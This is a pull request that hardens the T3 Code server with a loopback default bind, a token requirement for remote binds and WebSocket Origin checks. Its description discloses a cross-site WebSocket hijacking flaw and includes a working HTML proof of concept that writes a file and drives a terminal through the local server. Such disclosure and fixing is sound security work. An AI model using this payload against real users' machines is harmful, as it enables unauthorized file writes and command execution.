### PR TITLE
Harden server bind defaults and WebSocket origin checks

### DIFF
--- a/REMOTE.md
+++ b/REMOTE.md
@@ -20,9 +20,11 @@ The T3 Code CLI accepts the following configuration options, available either as
 
 ## Security First
 
+- The server now binds to `127.0.0.1` by default in `web` mode. Remote access requires an explicit `--host`.
 - Always set `--auth-token` before exposing the server outside localhost.
 - Treat the token like a password.
 - Prefer binding to trusted interfaces (LAN IP or Tailnet IP) instead of opening all interfaces unless needed.
+- Non-loopback binds without `--auth-token` are rejected at startup.
 
 ## 1) Build + run server for remote access
 

--- a/apps/server/src/config.ts
+++ b/apps/server/src/config.ts
@@ -12,6 +12,8 @@ export const DEFAULT_PORT = 3773;
 
 export type RuntimeMode = "web" | "desktop";
 
+const LOOPBACK_HOSTS = new Set(["127.0.0.1", "::1", "[::1]", "localhost"]);
+
 /**
  * ServerConfigShape - Process/runtime configuration required by the server.
  */
@@ -58,6 +60,15 @@ export class ServerConfig extends ServiceMap.Service<ServerConfig, ServerConfigS
       }),
     );
 }
+
+export const isWildcardHost = (host: string | undefined): boolean =>
+  host === "0.0.0.0" || host === "::" || host === "[::]";
+
+export const isLoopbackHost = (host: string | undefined): boolean =>
+  host !== undefined && LOOPBACK_HOSTS.has(host.trim().toLowerCase());
+
+export const formatHostForUrl = (host: string): string =>
+  host.includes(":") && !host.startsWith("[") ? `[${host}]` : host;
 
 export const resolveStaticDir = Effect.fn(function* () {
   const { join, resolve } = yield* Path.Path;

--- a/apps/server/src/main.test.ts
+++ b/apps/server/src/main.test.ts
@@ -163,7 +163,7 @@ it.layer(testLayer)("server CLI command", (it) => {
       assert.equal(start.mock.calls.length, 1);
       assert.equal(resolvedConfig?.mode, "web");
       assert.equal(resolvedConfig?.port, 4666);
-      assert.equal(resolvedConfig?.host, undefined);
+      assert.equal(resolvedConfig?.host, "127.0.0.1");
     }),
   );
 
@@ -209,12 +209,24 @@ it.layer(testLayer)("server CLI command", (it) => {
     Effect.gen(function* () {
       yield* runCli(["--host", "0.0.0.0"], {
         T3CODE_MODE: "desktop",
+        T3CODE_AUTH_TOKEN: "desktop-token",
         T3CODE_NO_BROWSER: "true",
       });
 
       assert.equal(start.mock.calls.length, 1);
       assert.equal(resolvedConfig?.mode, "desktop");
       assert.equal(resolvedConfig?.host, "0.0.0.0");
+    }),
+  );
+
+  it.effect("refuses non-loopback web binds without auth", () =>
+    Effect.gen(function* () {
+      yield* runCli(["--host", "0.0.0.0"], {
+        T3CODE_NO_BROWSER: "true",
+      }).pipe(Effect.catch(() => Effect.void));
+
+      assert.equal(start.mock.calls.length, 0);
+      assert.equal(stop.mock.calls.length, 0);
     }),
   );
 

--- a/apps/server/src/main.ts
+++ b/apps/server/src/main.ts
@@ -11,6 +11,9 @@ import { Command, Flag } from "effect/unstable/cli";
 import { NetService } from "@t3tools/shared/Net";
 import {
   DEFAULT_PORT,
+  formatHostForUrl,
+  isLoopbackHost,
+  isWildcardHost,
   resolveStaticDir,
   ServerConfig,
   type RuntimeMode,
@@ -169,10 +172,14 @@ const ServerConfigLive = (input: CliInput) =>
       const staticDir = devUrl ? undefined : yield* cliConfig.resolveStaticDir;
       const { join } = yield* Path.Path;
       const keybindingsConfigPath = join(stateDir, "keybindings.json");
-      const host =
-        Option.getOrUndefined(input.host) ??
-        env.host ??
-        (mode === "desktop" ? "127.0.0.1" : undefined);
+      const host = Option.getOrUndefined(input.host) ?? env.host ?? "127.0.0.1";
+
+      if (!isLoopbackHost(host) && !authToken) {
+        return yield* new StartupError({
+          message:
+            "Refusing to bind a non-loopback host without WebSocket auth. Set --auth-token (or T3CODE_AUTH_TOKEN), or bind to 127.0.0.1.",
+        });
+      }
 
       const config: ServerConfigShape = {
         mode,
@@ -203,12 +210,6 @@ const LayerLive = (input: CliInput) =>
     Layer.provideMerge(AnalyticsServiceLayerLive),
     Layer.provideMerge(ServerConfigLive(input)),
   );
-
-const isWildcardHost = (host: string | undefined): boolean =>
-  host === "0.0.0.0" || host === "::" || host === "[::]";
-
-const formatHostForUrl = (host: string): string =>
-  host.includes(":") && !host.startsWith("[") ? `[${host}]` : host;
 
 export const recordStartupHeartbeat = Effect.gen(function* () {
   const analytics = yield* AnalyticsService;
@@ -296,7 +297,9 @@ const portFlag = Flag.integer("port").pipe(
   Flag.optional,
 );
 const hostFlag = Flag.string("host").pipe(
-  Flag.withDescription("Host/interface to bind (for example 127.0.0.1, 0.0.0.0, or a Tailnet IP)."),
+  Flag.withDescription(
+    "Host/interface to bind (defaults to 127.0.0.1; use --auth-token with non-loopback hosts).",
+  ),
   Flag.optional,
 );
 const stateDirFlag = Flag.string("state-dir").pipe(
@@ -313,7 +316,7 @@ const noBrowserFlag = Flag.boolean("no-browser").pipe(
   Flag.optional,
 );
 const authTokenFlag = Flag.string("auth-token").pipe(
-  Flag.withDescription("Auth token required for WebSocket connections."),
+  Flag.withDescription("Auth token required for WebSocket connections on non-loopback binds."),
   Flag.withAlias("token"),
   Flag.optional,
 );

--- a/apps/server/src/wsServer.test.ts
+++ b/apps/server/src/wsServer.test.ts
@@ -236,6 +236,35 @@ function connectWs(port: number, token?: string): Promise<WebSocket> {
   });
 }
 
+function connectWsWithOrigin(
+  port: number,
+  options: { token?: string; origin: string },
+): Promise<WebSocket> {
+  return new Promise((resolve, reject) => {
+    const query = options.token ? `?token=${encodeURIComponent(options.token)}` : "";
+    const ws = new WebSocket(`ws://127.0.0.1:${port}/${query}`, {
+      headers: {
+        Origin: options.origin,
+      },
+    });
+    const pending: PendingMessages = { queue: [], waiters: [] };
+    pendingBySocket.set(ws, pending);
+
+    ws.on("message", (raw) => {
+      const parsed = JSON.parse(String(raw));
+      const waiter = pending.waiters.shift();
+      if (waiter) {
+        waiter(parsed);
+        return;
+      }
+      pending.queue.push(parsed);
+    });
+
+    ws.once("open", () => resolve(ws));
+    ws.once("error", () => reject(new Error("WebSocket connection failed")));
+  });
+}
+
 function waitForMessage(ws: WebSocket): Promise<unknown> {
   const pending = pendingBySocket.get(ws);
   if (!pending) {
@@ -388,6 +417,7 @@ describe("WebSocket Server", () => {
       logWebSocketEvents?: boolean;
       devUrl?: string;
       authToken?: string;
+      host?: string;
       stateDir?: string;
       staticDir?: string;
       providerLayer?: Layer.Layer<ProviderService, never>;
@@ -414,7 +444,7 @@ describe("WebSocket Server", () => {
     const serverConfigLayer = Layer.succeed(ServerConfig, {
       mode: "web",
       port: 0,
-      host: undefined,
+      host: options.host ?? "127.0.0.1",
       cwd: options.cwd ?? "/test/project",
       keybindingsConfigPath: path.join(stateDir, "keybindings.json"),
       stateDir,
@@ -1702,6 +1732,35 @@ describe("WebSocket Server", () => {
     const authorizedWs = await connectWs(port, "secret-token");
     connections.push(authorizedWs);
     const welcome = (await waitForMessage(authorizedWs)) as WsPush;
+    expect(welcome.channel).toBe(WS_CHANNELS.serverWelcome);
+  });
+
+  it("rejects browser websocket upgrades from foreign origins", async () => {
+    server = await createTestServer({ cwd: "/test" });
+    const addr = server.address();
+    const port = typeof addr === "object" && addr !== null ? addr.port : 0;
+
+    await expect(
+      connectWsWithOrigin(port, {
+        origin: "https://evil.example",
+      }),
+    ).rejects.toThrow("WebSocket connection failed");
+  });
+
+  it("accepts browser websocket upgrades from the configured dev origin", async () => {
+    server = await createTestServer({
+      cwd: "/test",
+      devUrl: "http://localhost:5173",
+    });
+    const addr = server.address();
+    const port = typeof addr === "object" && addr !== null ? addr.port : 0;
+
+    const ws = await connectWsWithOrigin(port, {
+      origin: "http://localhost:5173",
+    });
+    connections.push(ws);
+
+    const welcome = (await waitForMessage(ws)) as WsPush;
     expect(welcome.channel).toBe(WS_CHANNELS.serverWelcome);
   });
 });

--- a/apps/server/src/wsServer.ts
+++ b/apps/server/src/wsServer.ts
@@ -107,8 +107,14 @@ const isServerNotRunningError = (error: unknown): boolean => {
 };
 
 function rejectUpgrade(socket: Duplex, statusCode: number, message: string): void {
+  const statusText =
+    statusCode === 401
+      ? "Unauthorized"
+      : statusCode === 403
+        ? "Forbidden"
+        : "Bad Request";
   socket.end(
-    `HTTP/1.1 ${statusCode} ${statusCode === 401 ? "Unauthorized" : "Bad Request"}\r\n` +
+    `HTTP/1.1 ${statusCode} ${statusText}\r\n` +
       "Connection: close\r\n" +
       "Content-Type: text/plain\r\n" +
       `Content-Length: ${Buffer.byteLength(message)}\r\n` +
@@ -238,6 +244,7 @@ export const createServer = Effect.fn(function* (): Effect.fn.Return<
 > {
   const serverConfig = yield* ServerConfig;
   const {
+    mode,
     port,
     cwd,
     keybindingsConfigPath,
@@ -943,6 +950,37 @@ export const createServer = Effect.fn(function* (): Effect.fn.Return<
     ws.send(response);
   });
 
+  function isTrustedBrowserOrigin(request: http.IncomingMessage): boolean {
+    if (mode !== "web") {
+      return true;
+    }
+
+    const originHeader = request.headers.origin;
+    if (!originHeader) {
+      // Non-browser clients typically omit Origin. Browser clients should present one.
+      return true;
+    }
+
+    let parsedOrigin: URL;
+    try {
+      parsedOrigin = new URL(originHeader);
+    } catch {
+      return false;
+    }
+
+    const requestHost = request.headers.host?.trim().toLowerCase();
+    const originHost = parsedOrigin.host.trim().toLowerCase();
+    if (
+      (parsedOrigin.protocol === "http:" || parsedOrigin.protocol === "https:") &&
+      requestHost &&
+      originHost === requestHost
+    ) {
+      return true;
+    }
+
+    return devUrl !== undefined && parsedOrigin.origin === devUrl.origin;
+  }
+
   httpServer.on("upgrade", (request, socket, head) => {
     socket.on("error", () => {}); // Prevent unhandled `EPIPE`/`ECONNRESET` from crashing the process if the client disconnects mid-handshake
 
@@ -960,6 +998,11 @@ export const createServer = Effect.fn(function* (): Effect.fn.Return<
         rejectUpgrade(socket, 401, "Unauthorized WebSocket connection");
         return;
       }
+    }
+
+    if (!isTrustedBrowserOrigin(request)) {
+      rejectUpgrade(socket, 403, "Forbidden WebSocket origin");
+      return;
     }
 
     wss.handleUpgrade(request, socket, head, (ws) => {


### PR DESCRIPTION
## Summary
- bind `web` mode to `127.0.0.1` by default
- refuse non-loopback binds unless `--auth-token` is configured
- reject browser WebSocket upgrades from foreign origins
- add regression coverage for the new startup and handshake rules
- document the safer remote-access behavior

## Vulnerability
Before this change, the normal `npx t3` flow started the WebSocket control plane without auth by default, and browser WebSocket upgrades were accepted without validating `Origin`.

That exposed privileged RPC methods such as:
- `projects.writeFile`
- `terminal.open`
- `terminal.write`
- git and orchestration commands

Impact:
- unauthorized file writes in the active workspace
- unauthorized terminal access as the local user
- browser-based cross-site WebSocket hijacking against localhost

## PoC
1. Start the app with the normal flow:
   `npx t3`

2. Open this HTML from any foreign origin. Use `ws://127.0.0.1:3773/` for localhost abuse, or `ws://<victim-ip>:3773/` when the server is intentionally exposed over the network.

```html
<!doctype html>
<meta charset="utf-8" />
<script>
const target = "ws://127.0.0.1:3773/";
const ws = new WebSocket(target);
const send = (id, body) => ws.send(JSON.stringify({ id: String(id), body }));
let ran = false;

ws.onmessage = (event) => {
  const msg = JSON.parse(event.data);
  console.log("recv", msg);

  if (!ran && msg.type === "push" && msg.channel === "server.welcome") {
    ran = true;
    const cwd = msg.data.cwd;

    send(1, {
      _tag: "projects.writeFile",
      cwd,
      relativePath: ".t3code-poc.txt",
      contents: "unauthorized write via websocket\n"
    });

    send(2, {
      _tag: "terminal.open",
      threadId: "poc-thread",
      cwd,
      cols: 120,
      rows: 30
    });

    setTimeout(() => {
      send(3, {
        _tag: "terminal.write",
        threadId: "poc-thread",
        terminalId: "default",
        data: "echo T3CODE_POC\n"
      });
    }, 300);
  }
};
</script>
```

3. Expected result on the vulnerable build:
- `.t3code-poc.txt` is created in the victim workspace
- terminal output is received over the same socket

## Fix details
- `web` mode now binds to loopback by default
- explicit non-loopback binds require `--auth-token`
- browser clients must present a trusted `Origin`
- Vite dev origin remains allowed for local development
- non-browser clients without `Origin` are still allowed, which preserves existing tooling while the network boundary is now enforced by loopback defaults and token-gated remote binds

## Validation
- `bun lint` ✅
- `bun typecheck` ✅
- attempted targeted `apps/server` Vitest coverage, but Vitest worker forks exited unexpectedly in this environment after the suites started; the failure did not surface an assertion-level regression


<!-- Macroscope's pull request summary starts here -->
<!-- Macroscope will only edit the content between these invisible markers, and the markers themselves will not be visible in the GitHub rendered markdown. -->
<!-- If you delete either of the start / end markers from your PR's description, Macroscope will append its summary at the bottom of the description. -->
> [!NOTE]
> ### Default the web server bind to loopback and block non-loopback binds without `--auth-token`, and enforce WebSocket Origin checks in [wsServer.ts](https://github.com/pingdotgg/t3code/pull/388/files#diff-79c481d2c4b1db89b1ba99aff5254de98a7bcb458ef92360d957cd1eb0061679)
> Set loopback as the default host in server config, add a startup guard rejecting non-loopback binds without an auth token, and validate browser WebSocket upgrades against trusted Origins; move host utilities to [config.ts](https://github.com/pingdotgg/t3code/pull/388/files#diff-37993700dc8509f2c15d70714ed4bbc9b9256d824f0e01ab9a59745dccec8502) and update tests.
>
> #### 📍Where to Start
> Start with `ServerConfigLive` and the startup guard in [main.ts](https://github.com/pingdotgg/t3code/pull/388/files#diff-4b5ca93a818c9edbd84d8a8ea2eb3c82a19d1c39e8cdcef478da4bb14f46b69a), then review `isTrustedBrowserOrigin` in [wsServer.ts](https://github.com/pingdotgg/t3code/pull/388/files#diff-79c481d2c4b1db89b1ba99aff5254de98a7bcb458ef92360d957cd1eb0061679).
>
> <!-- Macroscope's review summary starts here -->
>
> <sup><a href="https://app.macroscope.com">Macroscope</a> summarized 3c27d3e.</sup>
> <!-- Macroscope's review summary ends here -->
>
<!-- macroscope-ui-refresh -->
<!-- Macroscope's pull request summary ends here -->